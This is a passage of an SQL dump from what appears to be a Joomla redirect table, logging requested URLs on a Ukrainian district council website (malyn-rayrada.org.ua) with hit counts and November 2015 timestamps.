00:00:00',301),(17660,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=38:--19122011-&layout=blog&Itemid=73&lang=ru&limitstart=25','','','',1,0,'2015-11-07 15:59:14','0000-00-00 00:00:00',301),(17661,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/934-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-yaka-peredaetsya-v-koristuv','','','',1,0,'2015-11-07 16:03:54','0000-00-00 00:00:00',301),(17663,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/60-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_2?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-07 16:57:11','0000-00-00 00:00:00',301),(17664,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/89-pro-hid-vikonannja-rajonnoi-programi_2','','','',2,0,'2015-11-07 16:57:12','0000-00-00 00:00:00',301),(17665,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/369-pro-vnesennja-zmin-do-kompleksnoi-dovgostrokovoi','','','',2,0,'2015-11-07 16:57:14','0000-00-00 00:00:00',301),(17666,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/457-pro-vnesennja-zmin-do-programi-zajnjatosti_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-07 16:57:35','0000-00-00 00:00:00',301),(17667,'http://www.malyn-rayrada.org.ua/index.php?Itemid=61&catid=30:--30122010-&id=228:-2011-&lang=uk&option=com_content&view=article','','','',4,0,'2015-11-07 17:15:15','0000-00-00 00:00:00',301),(17669,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=314:2011-05-20-13-01-00&catid=33&Itemid=66&lang=en','','','',3,0,'2015-11-07 20:09:57','0000-00-00 00:00:00',301),(17670,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/551-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_10','','','',7,0,'2015-11-07 20:17:26','0000-00-00 00:00:00',301),(17671,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/630-pro-orendu-ob’ekta-spilnoi-vlasnosti-teritorialnih','','','',4,0,'2015-11-07 20:34:28','0000-00-00 00:00:00',301),(17672,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=548:-2011-2015-&lang=ru&option=com_content&view=article','','','',4,0,'2015-11-07 21:58:10','0000-00-00 00:00:00',301),(17673,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=315:2011-05-20-13-07-47&catid=33&Itemid=66&lang=uk','','','',4,0,'2015-11-07 23:05:48','0000-00-00 00:00:00',301),(17674,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1194-pro-programu-vidshkoduvannya-vidsotkiv-za-kreditami-otrimanimi-naselennyam-malinskogo-rajonu-na-vprovadzhennya-energozberigayuchikh-zakhodiv-u-2015-rotsi','','','',8,0,'2015-11-07 23:40:36','0000-00-00 00:00:00',301),(17675,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&id=37:--21102011-&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',2,0,'2015-11-07 23:48:14','0000-00-00 00:00:00',301),(17676,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02/59-rishennja-radi/rishennja/-22022012-?lang=uk&start=14','','http://go.mail.ru/search_images','',2,0,'2015-11-08 00:13:37','0000-00-00 00:00:00',301),(17677,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/538-pro-vikonannja-planu-roboti-rajonnoi-radi-za-i_2','','','',7,0,'2015-11-08 01:23:55','0000-00-00 00:00:00',301),(17679,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1193-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',8,0,'2015-11-08 02:09:28','0000-00-00 00:00:00',301),(17680,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1166-pro-khid-vikonannya-rajonnoji-programi-sotsialnoji-pidtrimki-vnutrishno-peremishchenikh-osib-z-timchasovo-okupovanoji-te','','','',1,0,'2015-11-08 02:33:47','0000-00-00 00:00:00',301),(17681,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1165-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',18,0,'2015-11-08 02:38:24','0000-00-00 00:00:00',301),(17682,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1161-pro-zatverdzhennya-rajonnoji-programi-zabezpechennya-provedennya-protiepizootichnikh-zakhodiv-u-malinskomu-rajoni-na-201','','','',1,0,'2015-11-08 02:38:36','0000-00-00 00:00:00',301),(17683,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=uk&limitstart=5','','','',3,0,'2015-11-08 03:30:14','0000-00-00 00:00:00',301),(17684,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=uk&limitstart=5','','','',2,0,'2015-11-08 03:50:56','0000-00-00 00:00:00',301),(17685,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=867:2012-12-14-10-13-30&lang=ru&option=com_content&view=article','','','',2,0,'2015-11-08 04:17:56','0000-00-00 00:00:00',301),(17686,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&__543__lang=en&id=49&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2015-11-08 04:26:26','0000-00-00 00:00:00',301),(17687,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=430:14-&lang=en&option=com_content&view=article','','','',5,0,'2015-11-08 04:29:30','0000-00-00 00:00:00',301),(17688,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=333:-2011-&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-08 04:29:32','0000-00-00 00:00:00',301),(17689,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=639:2012-04-03-12-41-18&catid=42&Itemid=80&lang=uk','','','',1,0,'2015-11-08 04:40:53','0000-00-00 00:00:00',301),(17690,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=698:-6-16112010-5-&catid=43&Itemid=82&lang=uk','','','',2,0,'2015-11-08 04:40:55','0000-00-00 00:00:00',301),(17691,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=uk&limitstart=10','','','',1,0,'2015-11-08 04:40:55','0000-00-00 00:00:00',301),(17692,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=272:-2010-&catid=31:-25032011&Itemid=62&lang=uk','','','',1,0,'2015-11-08 04:40:56','0000-00-00 00:00:00',301),(17693,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=ru&limitstart=35','','','',1,0,'2015-11-08 04:40:57','0000-00-00 00:00:00',301),(17694,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=en&limitstart=25','','','',1,0,'2015-11-08 04:40:57','0000-00-00 00:00:00',301),(17695,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=188:2010-12-15-13-18-12&catid=29:--15122010-&Itemid=60&lang=ru','','','',1,0,'2015-11-08 04:41:40','0000-00-00 00:00:00',301),(17696,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=34&Itemid=68&lang=en&limitstart=5','','','',1,0,'2015-11-08 04:41:41','0000-00-00 00:00:00',301),(17697,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=en&limitstart=20','','','',1,0,'2015-11-08 04:41:43','0000-00-00 00:00:00',301),(17698,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=ru&limitstart=15','','','',1,0,'2015-11-08 04:41:52','0000-00-00 00:00:00',301),(17699,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=58&Itemid=105&lang=uk','','','',31,0,'2015-11-08 04:41:52','0000-00-00 00:00:00',301),(17700,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=53&Itemid=94&lang=uk&limitstart=20','','','',1,0,'2015-11-08 04:42:36','0000-00-00 00:00:00',301),(17701,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1024-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi','','','',16,0,'2015-11-08 04:42:58','0000-00-00 00:00:00',301),(17702,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/68-rishennya-vid-25-09-2014-roku/880-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik','','','',4,0,'2015-11-08 04:43:02','0000-00-00 00:00:00',301),(17703,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/68-rishennya-vid-25-09-2014-roku/879-pro-nadannya-prava-malinskij-rajonnij-radi-zdijsniti-pererakhuvannya-koshtiv','','','',6,0,'2015-11-08 04:43:03','0000-00-00 00:00:00',301),(17704,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1330:2014-06-03-06-17-00&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=16&lang=ru','','','',1,0,'2015-11-08 04:43:03','0000-00-00 00:00:00',301),(17705,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=762:-210-&tmpl=component&print=1&layout=default&page=&option=com_content&lang=ru','','','',1,0,'2015-11-08 04:43:04','0000-00-00 00:00:00',301),(17706,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/254-pro-zatverdzhennja-polozhennja-pro-konkursnij','','','',18,0,'2015-11-08 04:43:04','0000-00-00 00:00:00',301),(17707,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/220-pro-zvit-golovi-rajonnoi-derzhavnoi-administracii_2','','','',48,0,'2015-11-08 04:43:05','0000-00-00 00:00:00',301),(17708,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/10-pro-hid-vikonannja-rajonnoi-programi-shhodo','','','',9,0,'2015-11-08 04:43:05','0000-00-00 00:00:00',301),(17709,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/181-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi_2','','','',3,0,'2015-11-08 04:43:22','0000-00-00 00:00:00',301),(17710,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-/688-pro-zminu-nazvi-novovorob’ivskogo-zagalnoosvitnogo','','','',5,0,'2015-11-08 04:43:26','0000-00-00 00:00:00',301),(17711,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-?start=21','','','',22,0,'2015-11-08 04:43:27','0000-00-00 00:00:00',301),(17712,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/631-pro-peredachu-ob’ektiv-spilnoi-vlasnosti','','','',4,0,'2015-11-08 04:43:27','0000-00-00 00:00:00',301),(17713,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-?limitstart=0','','','',5,0,'2015-11-08 04:43:31','0000-00-00 00:00:00',301),(17714,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/331-pro-hid-vikonannja-rajonnoi-programi-budivnictva?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-08 04:43:32','0000-00-00 00:00:00',301),(17715,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=10:2010-06-05-15-11-20&catid=8:2010-06-05-12-54-02&Itemid=13&lang=ru','','','',1,0,'2015-11-08 04:44:06','0000-00-00 00:00:00',301),(17716,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/461-pro-vnesennja-dopovnennja-do-rajonnoi-kompleksnoi','','','',10,0,'2015-11-08 04:44:10','0000-00-00 00:00:00',301),(17717,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=631:-i-2012-&catid=42&Itemid=80&lang=uk','','','',2,0,'2015-11-08 04:44:10','0000-00-00 00:00:00',301),(17718,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=ru&limitstart=20','','','',1,0,'2015-11-08 04:44:12','0000-00-00 00:00:00',301),(17719,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/828-pro-stan-zlochinnosti-na-teritorii-malinskogo_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-08 04:44:16','0000-00-00 00:00:00',301),(17720,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/822-pro-stan-utrimannja-avtomobilnih-dorig-i-bezpeku?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-08 04:44:16','0000-00-00 00:00:00',301),(17721,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/815-pro-zatverdzhennja-rozmiru-groshovoi-kompensacii','','','',15,0,'2015-11-08 04:44:17','0000-00-00 00:00:00',301),(17722,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=675:2012-05-17-09-49-52&catid=42&Itemid=80&lang=uk','','','',3,0,'2015-11-08 04:44:20','0000-00-00 00:00:00',301),(17723,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12092012-/142-pro-nadannja-dozvolu-na-vidchuzhennja-ob’ekta','','','',4,0,'2015-11-08 04:44:23','0000-00-00 00:00:00',301),(17724,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=489:2011-12-02-06-51-07&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-11-08 04:44:44','0000-00-00 00:00:00',301),(17725,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=506:-lr&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-11-08 04:44:46','0000-00-00 00:00:00',301),(17726,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=519:-2011-&catid=5&Itemid=6&lang=uk','','','',1,0,'2015-11-08 04:44:47','0000-00-00 00:00:00',301),(17727,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=773:2012-10-02-06-48-57&catid=45&Itemid=84&lang=uk','','','',2,0,'2015-11-08 04:44:48','0000-00-00 00:00:00',301),(17728,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=530:-4050-vi-l-r-1-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2015-11-08 04:44:48','0000-00-00 00:00:00',301),(17729,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=823:2012-11-14-16-52-28&catid=45&Itemid=84&lang=uk','','','',1,0,'2015-11-08 04:44:50','0000-00-00 00:00:00',301),(17730,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=824:-2012-&catid=45&Itemid=84&lang=uk','','','',1,0,'2015-11-08 04:44:51','0000-00-00 00:00:00',301),(17731,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=827:2012-11-20-17-44-21&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2015-11-08 04:44:51','0000-00-00 00:00:00',301),(17732,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=700:-2012-2015-&catid=43:--25072012-&Itemid=82&lang=uk','','','',1,0,'2015-11-08 04:44:53','0000-00-00 00:00:00',301),(17736,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=860:09&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',1,0,'2015-11-08 04:45:42','0000-00-00 00:00:00',301),(17737,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/862-pro-nadannya-dozvolu-na-vlashtuvannya-murgi-p-o-do-chopovitskogo-statsionarnogo-viddilennya-postijnogo-prozhivannya-odinokikh-nepratsezdatnikh-gromadyan','','','',35,0,'2015-11-08 04:45:44','0000-00-00 00:00:00',301),(17738,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=680:2012-05-17-10-02-41&catid=42&Itemid=80&lang=uk','','','',1,0,'2015-11-08 04:46:02','0000-00-00 00:00:00',301),(17739,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=635:-2011-2015-&catid=42&Itemid=80&lang=uk','','','',1,0,'2015-11-08 04:46:03','0000-00-00 00:00:00',301),(17740,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=142:2010-10-15-06-19-49&catid=27&Itemid=58&lang=uk','','','',20,0,'2015-11-08 04:46:05','0000-00-00 00:00:00',301),(17741,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=33&Itemid=66&lang=ru&limitstart=20','','','',3,0,'2015-11-08 04:46:07','0000-00-00 00:00:00',301),(17742,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=ru&limitstart=10','','','',4,0,'2015-11-08 04:46:08','0000-00-00 00:00:00',301),(17743,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=317:-l-2008-2012-r&catid=33:-20052011&Itemid=66&lang=ru','','','',1,0,'2015-11-08 04:46:08','0000-00-00 00:00:00',301),(17744,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=4:-1062010&catid=4&Itemid=8&lang=uk','','','',1,0,'2015-11-08 04:46:09','0000-00-00 00:00:00',301),(17745,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=53&Itemid=94&lang=ru&limitstart=10','','','',1,0,'2015-11-08 04:46:11','0000-00-00 00:00:00',301),(17746,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/123-pro-hid-vikonannja-rajonnoi-programi-ozdorovlennja','','','',17,0,'2015-11-08 04:47:02','0000-00-00 00:00:00',301),(17747,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/493-pro-vnesennja-zmin-do-rishennja-i-sesii-rajonnoi_3?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-08 04:47:02','0000-00-00 00:00:00',301),(17748,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/488-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_9?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-08 04:47:04','0000-00-00 00:00:00',301),(17749,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/631-pro-peredachu-ob’ektiv-spilnoi-vlasnosti','','','',3,0,'2015-11-08 04:47:08','0000-00-00 00:00:00',301),(17750,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/630-pro-orendu-obâ€ââ€ÅÃ','','','',1,0,'2015-11-08 04:47:08','0000-00-00 00:00:00',301),(17751,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/339-pro-viznannja-takimi-shho-vtratili-chinnist-rishen','','','',18,0,'2015-11-08 04:47:10','0000-00-00 00:00:00',301),(17752,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/329-pro-vnesennja-zmin-do-rajonnoi-programi-rozvitku_2?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-08 04:47:10','0000-00-00 00:00:00',301),(17753,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/328-pro-vnesennja-zmin-do-rishennja-i-sesii-rajonnoi','','','',20,0,'2015-11-08 04:47:11','0000-00-00 00:00:00',301),(17754,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-?start=14','','','',32,0,'2015-11-08 04:47:12','0000-00-00 00:00:00',301),(17755,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/819-pro-vnesennja-zmin-do-rajonnih-program','','','',25,0,'2015-11-08 04:48:11','0000-00-00 00:00:00',301),(17756,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/542-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_20','','','',13,0,'2015-11-08 04:48:15','0000-00-00 00:00:00',301),(17757,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/398-pro-vnesennja-do-pereliku-ob’ektiv-shho','','','',5,0,'2015-11-08 04:48:18','0000-00-00 00:00:00',301),(17758,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/357-pro-hid-vikonannja-rajonnoi-programi_6','','','',9,0,'2015-11-08 04:48:22','0000-00-00 00:00:00',301),(17759,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/449-pro-aktualizaciju-shemi-planuvannja-malinskogo','','','',17,0,'2015-11-08 04:48:23','0000-00-00 00:00:00',301),(17760,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=505:2011-12-16-13-24-32&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-11-08 04:48:25','0000-00-00 00:00:00',301),(17761,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=737:2012-07-18-13-36-46&catid=43&Itemid=82&lang=uk','','','',2,0,'2015-11-08 04:48:35','0000-00-00 00:00:00',301),(17762,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=515:2011-12-22-10-09-17&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-11-08 04:48:36','0000-00-00 00:00:00',301),(17763,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=555:2012-01-27-13-50-13&catid=39&Itemid=76&lang=uk','','','',1,0,'2015-11-08 04:48:40','0000-00-00 00:00:00',301),(17764,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=560:2012-02-02-08-56-53&catid=39&Itemid=76&lang=uk','','','',1,0,'2015-11-08 04:48:40','0000-00-00 00:00:00',301),(17765,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=850:-2013-&catid=46&Itemid=85&lang=uk','','','',1,0,'2015-11-08 04:48:41','0000-00-00 00:00:00',301),(17766,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1171-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',22,0,'2015-11-08 04:49:42','0000-00-00 00:00:00',301),(17768,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/64-pro-obrannja-zastupnika-golovi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-08 04:49:50','0000-00-00 00:00:00',301),(17769,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/124-pro-zvit-nachalnika-viddilu-derzhkomzemu-v?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-08 04:49:50','0000-00-00 00:00:00',301),(17770,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=596:2012-02-28-12-59-05&catid=40&Itemid=77&lang=uk','','','',1,0,'2015-11-08 04:50:23','0000-00-00 00:00:00',301),(17771,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=481:-2012-2015-&catid=38:--19122011-&Itemid=73&lang=ru','','','',1,0,'2015-11-08 04:50:31','0000-00-00 00:00:00',301),(17772,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/181-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi_2','','','',3,0,'2015-11-08 04:50:35','0000-00-00 00:00:00',301),(17773,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/172-pro-vnesennja-dopovnen-do-rajonnoi-programi-shhodo','','','',23,0,'2015-11-08 04:50:36','0000-00-00 00:00:00',301),(17774,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/158-pro-hid-vikonannja-rajonnoi-programi-rozvitku_3','','','',16,0,'2015-11-08 04:50:36','0000-00-00 00:00:00',301),(17775,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-?start=7','','','',9,0,'2015-11-08 04:50:36','0000-00-00 00:00:00',301),(17776,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-?start=14','','','',20,0,'2015-11-08 04:50:37','0000-00-00 00:00:00',301),(17777,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-/690-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_24?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-08 04:50:38','0000-00-00 00:00:00',301),(17778,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-/688-pro-zminu-nazvi-novovorob’ivskogo-zagalnoosvitnogo','','','',3,0,'2015-11-08 04:50:39','0000-00-00 00:00:00',301),(17779,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/639-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2013_3?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-08 04:50:40','0000-00-00 00:00:00',301),(17780,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/631-pro-peredachu-ob’ektiv-spilnoi-vlasnosti','','','',3,0,'2015-11-08 04:50:40','0000-00-00 00:00:00',301),(17781,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/597-pro-hid-vikonannja-rajonnoi-cilovoi-programi_4','','','',16,0,'2015-11-08 04:51:03','0000-00-00 00:00:00',301),(17782,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-?start=21','','','',22,0,'2015-11-08 04:51:07','0000-00-00 00:00:00',301),(17783,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/833-pro-pidtrimku-vijskovosluzhbovciv-zhiteliv?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-08 04:51:09','0000-00-00 00:00:00',301),(17784,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/219-pro-znjattja-z-kontrolju-rishen-rajonnoi-radi_2','','','',22,0,'2015-11-08 04:51:10','0000-00-00 00:00:00',301),(17785,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/538-pro-vikonannja-planu-roboti-rajonnoi-radi-za-i_2','','','',17,0,'2015-11-08 04:51:12','0000-00-00 00:00:00',301),(17786,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/398-pro-vnesennja-do-pereliku-obâ€ââââ','','','',1,0,'2015-11-08 04:51:34','0000-00-00 00:00:00',301),(17787,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12092012-/142-pro-nadannja-dozvolu-na-vidchuzhennja-ob’ekta','','','',3,0,'2015-11-08 04:51:35','0000-00-00 00:00:00',301),(17788,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/508-pro-zvit-golovi-rajonnoi-derzhavnoi-administracii_3','','','',21,0,'2015-11-08 04:51:36','0000-00-00 00:00:00',301),(17789,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/697-pro-vstanovlennja-nadbavki-do-posadovogo-okladu_3','','','',26,0,'2015-11-08 04:51:36','0000-00-00 00:00:00',301),(17790,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=488:2011-12-02-06-34-46&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-11-08 04:51:37','0000-00-00 00:00:00',301),(17791,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=735:2012-07-18-13-32-43&catid=43&Itemid=82&lang=uk','','','',1,0,'2015-11-08 04:51:39','0000-00-00 00:00:00',301),(17792,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=544:2012-01-26-12-03-44&catid=39&Itemid=76&lang=uk','','','',3,0,'2015-11-08 04:51:42','0000-00-00 00:00:00',301),(17793,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=700:-2012-2015-&catid=43&Itemid=82&lang=uk','','','',1,0,'2015-11-08 04:52:01','0000-00-00 00:00:00',301),(17794,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:------qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',1,0,'2015-11-08 04:52:02','0000-00-00 00:00:00',301),(17795,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=7:2010-06-05-14-44-23&catid=2&Itemid=5&lang=uk','','','',2,0,'2015-11-08 04:52:02','0000-00-00 